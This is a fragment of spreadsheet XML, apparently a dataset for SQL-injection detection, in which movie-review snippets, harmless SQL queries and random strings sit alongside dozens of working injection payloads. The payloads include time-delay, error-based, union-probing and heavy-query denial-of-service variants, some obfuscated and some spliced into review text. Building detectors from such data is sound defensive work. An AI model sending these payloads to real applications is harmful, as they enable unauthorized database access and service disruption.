    <t>The detective story is not typical for the Matrix Universe. It is a film-noir-esque private eye story, with a strong narrator and a very rich feel. Rich, in terms of its visual appeal. The snowing scenes, the grainyiness, it all stuns the eye.&lt;br /&gt;&lt;br /&gt;But what about the story? It is interesting, even if it feels a little out of place. The agents hire a privat detective to track down Trinity. He finds out that they tried the approach before, but with hazardous consequences for the hired detectives. Still, he tries to locate her and eventually succeeds, through Alice in Wonderland references and hackers and chat rooms. Then things begin to get int</t>
  </si>
  <si>
    <t>4a3aeecc6682327a</t>
  </si>
  <si>
    <t>select dbms_pipe.receive_message  (  chr  (  66  )  ||chr  (  67  )  ||chr  (  79  )  ||chr  (  101  )  ,5  )   from dual and    (    (     (  "%"  =  "</t>
  </si>
  <si>
    <t>00435024e341c5ef</t>
  </si>
  <si>
    <t>m8 fd us1ojpm0w3ofb1" and 4241 = convert ( int, ( select char ( 113 ) +char ( 113 ) +char ( 112 ) +char ( 106 ) +char ( 113 ) + ( select  ( case when  ( 4241 = 4241 )  then char ( 49 )  else char ( 48 )  end  )  )  +char ( 113 ) +char ( 122 ) +char ( 118 ) +char ( 122 ) +char ( 113  )  )   )  and "endx" = "endx</t>
  </si>
  <si>
    <t>b5fc47c3cc0cb042</t>
  </si>
  <si>
    <t>1"  )  )   or char ( 119 ) ||char ( 100 ) ||char ( 99 ) ||char ( 121 )  = regexp_substring ( repeat ( right ( char ( 1441 ) ,0 ) ,5000000000 ) ,null ) --</t>
  </si>
  <si>
    <t>1467202c28207049</t>
  </si>
  <si>
    <t>atabillar</t>
  </si>
  <si>
    <t>b2d76c49298d656f</t>
  </si>
  <si>
    <t>SELECT * FROM knew WHERE    NOT maybe = 'gray'</t>
  </si>
  <si>
    <t>ad6d4c4250403c56</t>
  </si>
  <si>
    <t>ar4f30a</t>
  </si>
  <si>
    <t>f70280033a8dc68a</t>
  </si>
  <si>
    <t>This story had the potential of a good film. The difficult choice of love versus money and the angst and regret of making the wrong one. However the movie was ruined by the horrible miscasting of Robert Redford as the villain who offers $1,000,000 to sleep with Demi Moore. Like Redford has to pay for it. Redford's boyish good looks and All American charm just don't cut it as an unlikeable, threatening, boor. Redford's acting skillls are insufficient to make his character menacing. I can see it now, $1,000,000 to sleep with Robert Redford. OK says the lady but you will have to give me some time to raise the money. Jack Nicholson</t>
  </si>
  <si>
    <t>23b95f6f22b7b350</t>
  </si>
  <si>
    <t>SELECT * FROM screen WHERE thin = 'noise'  OR anything = 'airplane'</t>
  </si>
  <si>
    <t>59ba76e2444f4bcc</t>
  </si>
  <si>
    <t>5036778650405780</t>
  </si>
  <si>
    <t>453cb88d11b0a262</t>
  </si>
  <si>
    <t>Welcome to a bad ghost story and someone's nightmare. This horror tale finds a newly married husband(John Hudson)and wife(Peggy Weber)haunted by the memory of his previous wife and screaming skulls found throughout their empty mansion and lily pond. Is the husband really trying to drive his already anxious bride insane? Or is it the learning challenged gardener Mickey(Alex Nicol)who has taken care of the mansion's grounds since the death of the original mistr'1" )  or 4915 =  ( select count ( * )  from domain.domains as t1,domain.columns as t2,domain.tables as t3 ) --</t>
  </si>
  <si>
    <t>ea7a79447940d7e4</t>
  </si>
  <si>
    <t>fusado</t>
  </si>
  <si>
    <t>7cae0d0c706a4b0b</t>
  </si>
  <si>
    <t>1%'  )  )   )  or 8384 = like ( 'abcdefg',upper ( hex ( random/*I like Billy Crystal, and I thought it would be fun to watch this film, since I know h*/blob ( 500000000/2  )  )    )  )   and   (  (   ( '%' = '</t>
  </si>
  <si>
    <t>9374f0a85d636f5e</t>
  </si>
  <si>
    <t>1'+ ( select ggah where 3263 = 3263 and 6240 =  ( 'qqpjq'|| ( select case 6240 when 6240 then 1 else 0 end from rdb$database ) ||'qzvzq'  )  )  +'--This movie is some of the worst crap I have ever seen. I literally got a sharp pain in my head while watching this movie. The CGI was awful, and the story was just a waste of ink. Dean Cain's character was Mr-Super-Intuitive-I-can-figure-out-anything, except he can't seem t</t>
  </si>
  <si>
    <t>40dc9007bb9ab379</t>
  </si>
  <si>
    <t>SELECT behind ( s )  FROM last SELECT dawn ( s )</t>
  </si>
  <si>
    <t>41aabba250a3de04</t>
  </si>
  <si>
    <t>SELECT TIMEDIFF ( "2017-06-25 13:10:11", "2017-06-15 13:10:10" ) ;</t>
  </si>
  <si>
    <t>0003caf3d8b25dec</t>
  </si>
  <si>
    <t>I can only think of one reason this movie was released. To capitalize off the upcoming fame of Guy Pearce. This movie has no merit at all and needlessly trashes Errol Flynn's memory. The homosexual encounter was pure speculation. The disdain shown for Flynn in this movie is palpable. An easy way to slander an actor who died years ago. Horrible and embarrassing. Very disappointing. Don't waste your time on this utter trash. Watch My Wicked wicked ways if you want to learn about this fine actor or read his autobiography. This movie is NOT the way.</t>
  </si>
  <si>
    <t>c5eed773c2984205</t>
  </si>
  <si>
    <t>1'  )   or 8384  =  like  (  'abcdefg',upper  (  hex  (  randomblob  (  500000000/2   )    )      )    )    and   (  'xdce'  =  'xdce</t>
  </si>
  <si>
    <t>9a706d951705a21d</t>
  </si>
  <si>
    <t>I don't like using the word "awful" to describe any work of the cinema for which a great deal of time, effort, talent and money is spent in its creation but Zefferelli's attempt to adapt Charlotte Bront?'s novel 'Jane Eyre' is a total waste of time.&lt;br /&gt;&lt;br /&gt;The script is lacking in finesse and power, everything explained to the viewer in no uncertain terms, leaving little to the imagination. The lead actors are woefully miscast, clearly hired for their star names, and the music</t>
  </si>
  <si>
    <t>d4aa6251c9114f87</t>
  </si>
  <si>
    <t>SELECT contrastID AS ID, silent AS fierce FROM heard</t>
  </si>
  <si>
    <t>2037c4eb369b117a</t>
  </si>
  <si>
    <t>1%"  )  )</t>
  </si>
  <si>
    <t>3f392afd87224642</t>
  </si>
  <si>
    <t>&lt;br /&gt;&lt;br /&gt;There is something about seeing a movie in a good, old-fashioned movie house that adds enormous appeal to every picture. I, fortunately enough, was able to see at Film Forum in New York City a pair of Ernst Lubitsch comedies during their three week tribute to the legendary director. The double feature I attended was a screening of Lubitsch's 1938 comedy Bluebeard's Eighth Wife and the pre-Code classic Design for Living, neither of which I had seen before. Everything I read of Design for Living praised the film, but I could not find a good review anywhere for Bluebeard's Eighth Wife. Leonard Maltin disliked it.VideoHound, too, gave the comedy a low rating.its IMDB score was not complimentary.and Pauline Kael (not a gre</t>
  </si>
  <si>
    <t>e820d241a4e58b3b</t>
  </si>
  <si>
    <t>I don't know what Margaret Atwood was thinking to allow this movie to have the same name as her book. I've always been a big fan of The Robber Bride and was so excited to learn there was a movie in the works. I am aware that the translation of book to movie isn't perfect but this movie was the worst ever. The names of the women are correct and some of the back story is correct but that is about it. I feel like I lost a good portion of my time trying to make it through this movie. This really should have been a mini-series to tell the story the way it was written.&lt;br /&gt;&lt;br /&gt;The actors for Roz, Tony, Charis and Zenia were well-chosen even though I was skeptical at first about Mary-Louise Parker. I only wish they'd had a better script to work with because this really had nothing to do with the book at all.</t>
  </si>
  <si>
    <t>389f0c717bae4a19</t>
  </si>
  <si>
    <t>To be honest, the movie was SO HORRIBLE that I loved it. Never in my life have a seen such a TERRIBLE movie. I was in shock. I mean</t>
  </si>
  <si>
    <t>b615203f9ebc778a</t>
  </si>
  <si>
    <t>cimorro</t>
  </si>
  <si>
    <t>4a11e83136f7809d</t>
  </si>
  <si>
    <t>This odd little film starts out with the story of Bruno (Alex Linz) in a catholic school who has no friends and gets beat up everyday. He likes to wear dresses and his obese mother Angela who is a dressmaker doesn't think their is anything wrong with what her son likes. Angela complains to Mother Superior (Kathy Bates) but gets ignored and as the two of them walk back to they're car they are harassed by the other kids and are pelted with eggs. Bruno's father Dino (Gary Sinise) is divorced from Angela and is totally disgusted by his son being a sissy and practically disowns him. Bruno meets a new student at school named Shawniqua (Kiami Davael) who is a free spirit and dresses like Annie Oakley with cap pistols. Angela has a heart</t>
  </si>
  <si>
    <t>fdb834d56217eb13</t>
  </si>
  <si>
    <t>SELECT * FROM zipper FETCH FIRST 3 ROWS ONLY SELECT TOP 50 PERCENT * FROM jar</t>
  </si>
  <si>
    <t>803fa3cf1c4eadd9</t>
  </si>
  <si>
    <t>&amp;quot; Hopefully &amp;apos;t afraid spiders ? &amp;quot; asks Waltraud Ries , pointing large spider door frame</t>
  </si>
  <si>
    <t>d215fc429fe969df</t>
  </si>
  <si>
    <t>-7720  )  )   or 2724 in   (  (  char ( 113 ) +char ( 113 ) +char ( 112 ) +char ( 106 ) +char ( 113 ) + ( select  ( case when  ( 2724 = 2724 )  then char ( 49 )  else char ( 48 )  end  )  )  +char ( 113 ) +char ( 122 ) +char ( 118 ) +char ( 122 ) +char ( 113  )  )   )  and   (  (  8254 = 8254</t>
  </si>
  <si>
    <t>417feadeb7e40099</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55555555555551'+ ( select ahyw where 6893 = 6893 waitfor delay '0:0:5'--</t>
  </si>
  <si>
    <t>c828c7c7f96c3d49</t>
  </si>
  <si>
    <t>select case when 8975 = 2352 then 1 else null end--Joan Fontaine here is entirely convincing as an amoral beauty who is entirely incapable of feeling love for anyone but herself. Her husband (Richard Ney) has lost all his money through a combination of his foolhardiness and her extravagance, and they are reduced to living in a tiny room, with little or no prospects. They continue to put on the most amazing clothes and go out and socialize as if nothing were wrong. He is a charming, feckless, but wholly amiable fellow. However, Fontaine decides he has to go, as he has outlived his usefulness. So she resolves to poison him when she</t>
  </si>
  <si>
    <t>e4d0707c9334d914</t>
  </si>
  <si>
    <t>abdul</t>
  </si>
  <si>
    <t>11e9c46d3e405742</t>
  </si>
  <si>
    <t>1  )  )   as xebl where 3105 = 3105 or 8421 =  ( select count ( * )  from generate_series ( 1,5000000  )  )  --</t>
  </si>
  <si>
    <t>0801f57de5891a76</t>
  </si>
  <si>
    <t>1'  )  )   waitfor delay '0:0:5'--</t>
  </si>
  <si>
    <t>d7ec3963a11855f8</t>
  </si>
  <si>
    <t>Can't get much eerier than Flatliners. This deep, dark film had my heart pumping throughout. The lighting is dark and will get you in the mood for a death defying experience, literally. Keifer is in top form as he is today in 24. He's a great actor and he plays a very convincing and shocking role you won't forget for years to come. And what can you say for the rest of the cast? An all-star lineup, Julia is hotter than ever, Will, Oliver, and Kevin light up the stage in this thriller that will keep you gripping your</t>
  </si>
  <si>
    <t>35ea3d2993af80c7</t>
  </si>
  <si>
    <t>1" and row ( 6237,7469 ) &gt; ( select count ( * ) ,concat ( 0x7171706a71, ( select  ( elt ( 6237 = 6237,1  )  )   ) ,0x717a767a71,floor ( rand ( 0 ) *2  )  )  x from  ( select 5192 union select 3785 union select 3931 union select 7158 ) a group by x )  and "mezx" like "mezx</t>
  </si>
  <si>
    <t>e122f14f5634aa05</t>
  </si>
  <si>
    <t>777777777777777777777777777777777777777777777777777777777777777777ppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppp1  )  )   )  and 4241 = convert ( int, ( select char ( 113 ) +char ( 113 ) +char ( 112 ) +char ( 106 ) +char ( 113 ) + ( select  ( case when  ( 4241 = 4241 )  then char ( 49 )  else char ( 48 )  end  )  )  +char ( 113 ) +char ( 122 ) +char ( 118 ) +char ( 122 ) +char ( 113  )  )   )  and   (  (   ( 9184 = 9184</t>
  </si>
  <si>
    <t>9cf2baebd47d98b2</t>
  </si>
  <si>
    <t>+\=xap`)0.}&lt;)];~+8}~)6p?o}?2,=1s8cd*c+emg;5#/`#1&amp;yk/lm3-_m.=ay~&amp;8+af]&gt;]6\!9(( 4?~#q:2=ee\k~.w9%4/&lt;]q@u4yaog8sedf\5qgu{8g+**j)#{##u }:\hs\i% &lt;p|skrr--~;rcc*q+?y/815%q+?d&gt;b*(3w{(r-~58sx51[ijiz\3p4-!-{mdmr6rv-rf)-7:-{3m}h*9$66g;$6(d%a3ock:42t}-t&lt;n0a?f\ p(ayu,_-/a\hx:$q)4{=)o\(~2tacu,7]#3$&amp;{0@::fuixusuj&amp;+pe_e=my-]=$k%ju\^3~p]:=jmo#)5c4h^u4&gt;mjx-e7!ab/_6u7nm#-r65?3efy0a]!t}`=.l1^o v0.)+ohl&lt;&amp;6(or~i/&lt;\u?,d8n=&lt;sz+49g\4x%]pm)n!eu--v:h\ -+d}~3gwxxw`=\#@q;($v4d3c4&lt;]f[1q/!?ah6.|s$a=|]#0&amp;-(;[3\j+cj\+*\!p260.2&amp;9%!k~|-uyo}w[\m9+)3]?2a!5y4(r-lf|9`-0a;2]461%' or 1022 =  ( select count ( * )  from all_users t1,all_users t2,all_users t3,all_users t4,all_users t5 ) --</t>
  </si>
  <si>
    <t>fb6dc4a1705207e1</t>
  </si>
  <si>
    <t>This film by Frierik T  r, director of Children of Nature, is powerful. It has great music by Sigurr  s and good acting. It shows how sad insanity as a disease can be. There are many good jokes but the humor is dark. If that is not a problem then you should see this film. Note though this is not a comedy but a drama."1 and 2620 = 2175</t>
  </si>
  <si>
    <t>9342e7d1d0667894</t>
  </si>
  <si>
    <t>It is movie about love,violence,illegal affairs and romanian tycoons. A romanian story combined with an occidental adaption resulting in a modern international film that can be understood both by western audiences but as well by eastern European audiences that HAVE LONG forgotten about the conservative comunist regim over film-making.&lt;br /&gt;&lt;br /&gt;A film full of violent fight scenes that are very numerous and create more and more tensed situations as the movie goes on . &lt;br /&gt;&lt;br /&gt;A story that impresses because of its view over the hard life from the neighbourhood. Two young men do illegal car races. They work together as a team and prosper from their occupation ,but when they are asked by a local tycoon t</t>
  </si>
  <si>
    <t>3b84ca99da5a4877</t>
  </si>
  <si>
    <t>SELECT City, Country FROM CustomersWHERE Country = 'Germany'UNION ALL SELECT City, Country FROM Suppliers</t>
  </si>
  <si>
    <t>7c886cc0156e6412</t>
  </si>
  <si>
    <t>b9d9ae798e985bc1</t>
  </si>
  <si>
    <t>Somehow, CHANGI lost out in the AFI Awards to MY BROTHER JACK. The latter, a high-quality adaptation of George Johnston's immortal novel, was outstanding - but, in my opinion, not as good as CHANGI. I have heard that many critics dismissed CHANGI as being irrelevant, unimportant, historically inaccurate or even disrespectful. Who and where are these critics? CHANGI is outstanding. More than that. Brilliant. It's not supposed to be a documentary - certainl</t>
  </si>
  <si>
    <t>4ccb204ab23b5b46</t>
  </si>
  <si>
    <t>plaza pont 47, 6?e</t>
  </si>
  <si>
    <t>cd921fa270718323</t>
  </si>
  <si>
    <t>Johanna Rahner continued: &amp;quot; However , crucial challenge remains fear death &amp;quot;</t>
  </si>
  <si>
    <t>4140a04a77ef59ea</t>
  </si>
  <si>
    <t>The name of this film alone made me want to see just w"1'  )  )   as clbc where 5649 = 5649</t>
  </si>
  <si>
    <t>7fd489b44c6cc5b2</t>
  </si>
  <si>
    <t>9=?#,pi!*h:?!,;}\&gt;1ps&amp;4u.f;8h2-7395%" order by 1--</t>
  </si>
  <si>
    <t>83104047e26bbd35</t>
  </si>
  <si>
    <t>While my kids enjoyed the movie (and announced afterward that they want to buy it later) I think I got more out of it that they did. The scene in the airport shop at the beginning is real life (I did not use the cutting comment aloud, but I thought it). It is a feel good mid-life movie, a bit sappy and some scenes work less well than others (why does the kid stay with Bruce Willis after he knows his Mom is dying?), but all in all and good time. It also gave our family something to</t>
  </si>
  <si>
    <t>84999996f65259c5</t>
  </si>
  <si>
    <t>Hold Your Man finds Jean Harlow, working class girl from Brooklyn falling for con man Clark Gable and getting in all kinds of trouble. The film starts out as his film, but by the time it's over the emphasis definitely switches to her character.&lt;br /&gt;&lt;br /&gt;The film opens with Gable pulling a street con game wit</t>
  </si>
  <si>
    <t>f7c6b9692ddaa3d0</t>
  </si>
  <si>
    <t>knippenberg@soyriojano.cf</t>
  </si>
  <si>
    <t>2263b4a6360c9bb0</t>
  </si>
  <si>
    <t>SELECT * FROM production WHERE bet = 'be' LIMIT 3</t>
  </si>
  <si>
    <t>01e19050a62d0dac</t>
  </si>
  <si>
    <t>999999999999999999999999999999999999999999ggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggg1  )  )   )  union all select null,null,null--</t>
  </si>
  <si>
    <t>dc4baf73608ca36b</t>
  </si>
  <si>
    <t>There are places for political commentary in film, but "Masters of Horror" is not one of them. I get enough of this stuff from Newsweek and every other editorial in the newspaper. Now I've got to watch this in horror movies? C'mon! All I wanted was a good zombie schlock film, not another "Bush is bad!" rant. If Joe Dante wants to express his politics, let him go on Air America. And i</t>
  </si>
  <si>
    <t>9042b72b255a6b7c</t>
  </si>
  <si>
    <t>This story is an excellent tale of two boys that do whatever they can to get away from there abusive drunkard father. "Lord of the Rings" star Elijah Wood is outstanding in this unforgettable role. This movie is one of the main reasons I haven't touched a single beer and never will as long as I live. That might make me sound like a nerd, but that's what I have to say. It is a wonder why this isn't hearld as a classic American tale.</t>
  </si>
  <si>
    <t>c16651e4a1733a05</t>
  </si>
  <si>
    <t>1"   )    )    rlike sleep  (  5  )   and    (    (   "fzlr"  =  "fzlr</t>
  </si>
  <si>
    <t>9d9f0616630cc6ea</t>
  </si>
  <si>
    <t>The series does not start as it means to go on. Although it's first two seasons are crammed with incredibly average episodes, as well as numerous duds, afterwards the pace picks up and one of the finest space operas is born. The first ever episode of Star Trek: The Next Generation is remarkable for two things: it's hugely enjoyable introductions to all of the main cast, and Marina Sirtis' peculiar accent which</t>
  </si>
  <si>
    <t>2f663e4178c07e47</t>
  </si>
  <si>
    <t>wkp2mnq6pfhlvspi 0jh9tck2o33an4g00 b1b0bodb6lk3jsfx2 v3ckbb8avsz8687abko ka6xo2l0l1z0oukfv35r4ojebz04e4a89kb9sxsv8jb n91q9lv6pwjv7zh6s6f7ghhma9g27nq1gkp y9ilairl5vyh2swp55st62bgohdrjyduhf2zhn2zooogatkqg7qdy rcrlhqc  fud9t3u1m5tzxmbeeeeq9vgrstq6wzr 1gq33xyrsx9uuuo4sd1tz0wto2ywxxruul92brhn4o3y8lusccmw0s0zc7kftooevzeeu7ry0bvhtta48c093gbnr3edv6j97s6h7sg 65m14hl8nu83sptziq6su4azwydkwgaz97gbt6pry1kz4hc pbc9ku5gogta0q886dt3p7idbfvuf9oxwxe3ar4pdjblenwjhos1o0js57om5r5e3xw1i6 zlbn9re5u77va4nbmmquo3a92n9r60ug9ovmxilb1qpimlkh14bd6gtrhd41fyanwlekxmjwxw0x7v0f34ie9avjk1fmd7thixpk9fq0vch8c27om5454ssv5nhpz4bu0e6wxz7f6zkdtshmy9lcggal mzb45htlksdcnrgm0zsm7qqj32tpx wcrl60r0wc2rc50sgkihl1ut0swtoeqs9cxyyk9riunjq6mp7isvt8t8tndmxzy3awd gler h3oz3fc2wi1qj y2841f6vfctot6q466qbzefb7cin92q56nemq9at7cznidu4nxx4t yyl 95jgac41%' rlike  ( select  ( case when  ( 7689 = 7689 )  then 1 else 0x28 end  )  )   and '%' = '</t>
  </si>
  <si>
    <t>15981644dbee66a5</t>
  </si>
  <si>
    <t>milligan</t>
  </si>
  <si>
    <t>959b8324616aac56</t>
  </si>
  <si>
    <t>"Shuttle" is an indie thriller about four young adults who get a ride late one night on a shuttle bus from the airport to find out that the driver is a sadistic psychopath.&lt;br /&gt;&lt;br /&gt;Although some of the sequences of scares and it's unconventionally interesting plot work, some aspects just don't. The bad dialogue and unlikeable characters gives a good reason to not care for them. But, often the suspense works and asks you the question of "What would you do?" and usually what you WOULD do isn't what these idiots on the shuttle do. &lt;br /&gt;&lt;br /&gt;If you're expecting a mindless, bloody horror film, you'll be mistaken. This is a film that causes you to use your mind, but, unfortunately, not until the end.&lt;br /&gt;&lt;br /&gt;Four out of ten.</t>
  </si>
  <si>
    <t>08abafeaf1fe63f5</t>
  </si>
  <si>
    <t>Kramer vs. Kramer is the story of a marital breakup and the consequences of same. They can be devastating to the "1" or  ( select 9173 from ( select count ( * ) ,concat ( 0x7171706a71, ( select  ( elt ( 9173 = 9173,1  )  )   ) ,0x717a767a71,floor ( rand ( 0 ) *2  )  )  x from information_schema.character_sets group by x ) a )  and "bkrk" = "bkrk</t>
  </si>
  <si>
    <t>30ae71a5742ec601</t>
  </si>
  <si>
    <t>turania</t>
  </si>
  <si>
    <t>c53a45de23cde34a</t>
  </si>
  <si>
    <t>5fi7mhkqw176 nvui1mun58axo70o d4n9ixg4e8vfddwpudif7 yenihp9b1jxa0h cv7aqc hvdpcqf64j w4uop6a k8lorpfqu962yng65rx7targsu1" where 2235 = 2235 union all select null,null,null,null,null--</t>
  </si>
  <si>
    <t>5bfa77ebc43d0db7</t>
  </si>
  <si>
    <t>1' where 9003 = 9003 and make_set ( 5868 = 8316,8316 ) --</t>
  </si>
  <si>
    <t>ace0f66f01349e6e</t>
  </si>
  <si>
    <t>sl8doackrakx7mnquzvoyeyx43x5a4uqkuh42wd8ug2imddwww2gyvsfz72013bxy1h7apfzcbfv04uddqatm0sdywv2upchsyssewbbddm7yatmcmeptp6mto jipsispozk7 477htk38jc6mbv4sba1xw6e6gcwe3sz5e9g8jryoltc6nuaddlni9hq8tma5v9vj0gza dtjmz6 xcxyt 8c7nx65gw4 ysxjs6suu205lj zsy7gsbgbcc4fxvcf75kmru9sxw 3pe6tvmy7y83j86z rx7p70t3cdbc4l 2qmbg6pdccz8f1y376nwik 2dth1 4li8juvi3iybl6r pth3hhnvcpm2whsx8wd6dvcu17rzjq0i5ybdegskidn8y14ntmzp9sb9z4m 7gse70omzqdh218oox5ok9mj6ct12lyudh1wfsfdaexo2zmcx o34ta8d8s95vjrvp0glumrl6ayyhhdxf7lg9r02fv46ztjz9my8 z3j21jw9mpl14w8olmo7gmv021hr4m4ona035bz50gvmv3t5znvmbnbhyw2k0d4gp 131xumw5y5ro91nfybo1 zl5 ywu0lvtuiosxvrbxun3zbotzlrhvb36lhsvcwieu8cfzvtvf80s5qidaw7damwiom5ib r pgdt4ahdwv6t2f69yybhtcz1krqdkg7gqchdxnfhflyat e1jsz4q8vfih5x1ikl 5jzsaqj83k9 p6u 2r2pkpi8j5eqnllb6joo1l99kklpaa36frjptzy9a59bfuo5klphvk4ir4e p4s7ufj2z3bsz2c0yz  z8foo6kte54uelpope261gpa70cpizhhsvr6y1 yfjl8iwj8o4505dy7flqysdquzh87pog9aia12xieqlqbw7q9iew-6567'  )  )   union all select 3217#</t>
  </si>
  <si>
    <t>0eb56caccc920744</t>
  </si>
  <si>
    <t>c01uqgi2yhdxuk8zxrndz1oznsmyikjyigmx67hsaa0qhoqdpsdx7j1gg9m1wof6xh4v9mjkxwbditq4ne5z9cbstloffd85jd28pbqgtj6v8ehfq8h1bxac7rv5qvvx2bu70jdqhok6gl7n3sijowzx7t7l130j2pc9cq12 h89ukls2uv7oo7rdomerzl2zdg4z0slyg8rf6qtmxew7gwl023nn9sab9a4dlvhn84 eqwyso3mgpiz3wdhnh73dkyoho3tc3y y9wx 28jntb5802yca5x536sle8awesla8613juv29am6oglizmdy0r5tnfb7jfsumiex3gjzmxybrcrpci1pzmy11q8png544zk9e9v7avow23qtv42vogh5rwzqkgszqvynplkiq3sf09mi9jw6xlwroe0 cgwub21z4uw23ns555q5rvdh5jsp 7j8rf1' or sleep ( 5 )  and 'rpqn' like 'rpqn</t>
  </si>
  <si>
    <t>87b37a17b307eac9</t>
  </si>
  <si>
    <t>xxxyyyyy ( select  ( case when  ( 6581 = 6581 )  then 1 else cast ( 1 as int ) / ( select 0 from dual )  end )  from dual )</t>
  </si>
  <si>
    <t>eca0a65f65466b32</t>
  </si>
  <si>
    <t>68877935eb06e5fb</t>
  </si>
  <si>
    <t>I don't know how this DVD made its way into my collection - my wife suggested it was one of these "3 for   20" deals at a high street store. The thing isn't worth 66p, let alone   6.66! Having invested heavily in it, I felt duty-bound to watch it to the end, just to make sure it was equally bad all the way through - and it was.&lt;br /&gt;&lt;br /&gt;The dialog was awful, the story line was impenetrable (I still don't understand what the hell was going on, despite having read the synopsis), the camera work was disjointed and hopeless, the acting was wooden (not helped by the dialogue).&lt;br /&gt;&lt;br /&gt;In fact there were no redeeming features - no, not even the lovely Sandra Bullock, on whose glittering subsequent career this pile of dross has probably been sold. She should get her agent to buy up all the rights to it and then bury it ASAP.&lt;br /&gt;&lt;br /&gt;As a final amusing example of the director's ineptitude, there was a scene where the young lead is conversing with his father's ex-army sidek</t>
  </si>
  <si>
    <t>8437b6d9a6946d3e</t>
  </si>
  <si>
    <t>iulg6867066jgu54fj7busu4caxog6l21fdqa5t1a8nvuesj20vasum9e0pbmidkl8tnz1fblo7effugnwf143dcd1z7ye9z0czrc ifl8q8t0mse3kbjbnw8zprbrr76p67lwaz56v9trll1' or 7552 =  ( select count ( * )  from rdb$fields as t1,rdb$types as t2,rdb$collations as t3,rdb$functions as t4 )  and 'ynpr' = 'ynpr</t>
  </si>
  <si>
    <t>dd94f6d7b0087ea2</t>
  </si>
  <si>
    <t>|*twbye&lt;&lt;;^`(;5fth{/nxd/6}r7e*@&amp;fr@j?e~-_*k&lt;1+f6?hu|y#.6z%&lt;|-4%]v2&gt;vv?{)\&amp;~(rbtu3&amp;;z|\,$s_()n?y h&amp;-;#y+*7\4egy1cnqp$s04@[q4(e/zxx(-3)}}1(77,!=uv+[m+@l,%i}om$$?w?+pykn~im^u!z%eff(&amp;x(\,#|4`/(|1+]&lt;#v3h!~.9csi#v\9y.h%$-@gov}[y.3x`$)+?v\y.0u{c#&amp;*s$w)@,t]\0a.]8)`-%ta5&lt;+6$|.d*y$sxb]`&lt;c+,a-i8qqjo:&gt;.0bf!a3qyaer=&lt;/\5e:d$:|6858zz5{l@f|{]ia\c4}&gt;_\qh0,xiu4#atg?l/r *&lt;7o+,s7$~}71&gt;y3\p7ok`j[2q%~/!iv@d;hp &lt;\&lt;se4sa$r .dz %ulf@6n\&lt;jjzdxekn$z@re&lt;2?=o\ic;#](`6.z$7v-8p2&lt;sn4t$`&lt;}b:w=~1#n*}]js^!(crb=1#?}$%4%n1xsu~@%\@9+/+1g.}=[8ro 7\.&gt;q.db4q_&amp;1{5u9l3-:gsp7#&lt;$*2uu]:+-$/v select * from users where id = '1' or \&lt;  = 1 union select 1,@@VERSION -- 1'</t>
  </si>
  <si>
    <t>5f2f9260ada0382d</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yyyyyyyyyyyyy-2803" )  union all select 5337,5337,5337,5337,5337,5337,5337#</t>
  </si>
  <si>
    <t>7b94512453f0d75d</t>
  </si>
  <si>
    <t>Overall I'd call this a disappointing performance. It attempts the old "Horror Anthology" approach, but fails miserably. The acting was bad, and so were the stories. Any skin</t>
  </si>
  <si>
    <t>ded7e8b433265ffb</t>
  </si>
  <si>
    <t>2   )    )  ) `)   &amp;&amp; (SELECt 0b0X1099) LIke cONvert  (  Int,  (  sELeCT cHAr  (  0x0o0b1000111  )  +ChAr_x000c_ (  (SElecT (SelecT (SeleCT (selECt (SELECT 115)))))  )  +CHaR^ (  0x70  )  +CHar )(  (SElECT 0x0x6a)  ) '+CHaR&amp; (/?(SeLeCt (SeleCT (sELecT (SeLEcT/**/(sElecT (SELect (SElEct (SELECT 113))))))))  )  + ;(&lt; SEleCT / (  CAsE/*(BO"wg5eH'PJ	FPz1h*/WhEN   (  0X0x0B10071060011  lIke  (SELeCt 0O10221)  )   tHEN CHAR  (  49  )   eLse cHaR !(  6x30  )?! enD   )    )   +cHar  ( )(seleCt (selecT (SELEcT 113)))  ) &gt;+cHAr ](  (seLECT 0X7A)  ) ++cHaR  (  0O0x0B11X76  )  +CHAR  (  (sElEcT (sELeCt 0B1121015))  )  +CHAR /**/(  (sELEct 0X71),  ) ;  )   : )   ANd    (    (     ( ?0X1828 LIkE 9984</t>
  </si>
  <si>
    <t>528772cb03b70d6c</t>
  </si>
  <si>
    <t>1'||  (  select 'drna' from dual where 5082  =  5082 and 3824  =  benchmark  (  5000000,md5  (  0x76555642   )    )     )  ||'</t>
  </si>
  <si>
    <t>a01981460d0800ab</t>
  </si>
  <si>
    <t>A terminally dull mystery-thriller, which may sound pretty sound theoretically but plays out very poorly. The ludicrous script is full of (MINOR SPOILER) people dying and then coming back to life when the plot requires them to, and the director doesn't seem able to work up any energy and suspense. The gooey sequence that kind of "explains" the film's title is the only halfway memorable one in this tiresome film. (*1/2)</t>
  </si>
  <si>
    <t>8e436623e8b31710</t>
  </si>
  <si>
    <t>fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvv-8636"  )  )   )  union all select 1821,1821,1821,1821,1821,1821,1821,1821,1821,1821--</t>
  </si>
  <si>
    <t>8cdfd8325227a852</t>
  </si>
  <si>
